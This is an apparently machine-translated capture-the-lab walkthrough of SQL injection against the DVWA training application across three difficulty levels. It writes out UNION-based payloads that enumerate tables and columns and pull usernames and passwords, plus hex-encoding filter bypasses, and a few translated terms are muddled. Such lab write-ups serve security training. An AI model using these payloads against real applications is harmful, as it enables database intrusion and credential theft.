SQL injection of DVWA (1)
1. Low-level
1. Enter the ID to get an echo:
2. Judge the injection method:
enter1’ and ‘1’ = ‘1’ #Success echo:
enter1’ and ‘1’ = ‘2’ #Echo failed:
it is judged as single quote character injection.
3. Determine the number of columns and the data echo position
use order by The statement determines the number of columns.
use 1’ order by 3 #An error occurred:
use1’ order by 2 # Successfully echoed, indicating that the number of columns is 2:
4. Use union joint injection query, you can echo the position and get the current library
use -1’ union select 1 , 2 #Judging the echo position: It
can be echoed in two places.
Use the database() function to get the current database:
5. Get the table name
use -1’ union select 1 , group_concat(table_name) from information_schema.tables where table_schema = ‘dvwa’ #
Get the table name:
6. Get the field name
use -1’ union select 1 , group_concat(column_name) from information_schema.columns where table_name = ‘users’ #
Get the field name:
7. Obtain key information (user name, password)
use -1’ union select user , password from users #
Get username and password:
Source code key statement:
2. Intermediate level
It is found that the ID is a drop-down list without an input box: you
can use burpsuite to capture packets for injection.
Judging that the injection method and library name are the same as before, it is found to beDigitalInjection, the library name is 'voice'。
Judgment table name
When judging the table name, use -1 union select 1 , group_concat(table_name) from information_schema.tables where table_schema = ‘dvwa’ # An error occurred during the statement:
Check the source code and find that special characters are filtered out:
So optimize the sql statement:
-1 union select 1 , group_concat(table_name) from information_schema.tables where table_schema = database() #
Or convert the library name dvwa to hex code: 0x64767761 to bypass:
Judge field name
In the same way, hex code 0x7573657273 for the table name users
3. High level
Another page appears to prevent automatic tool injection.
The judgment steps are the same as before, and it is judged to be a single quote character injection.
Refer to low-level injection.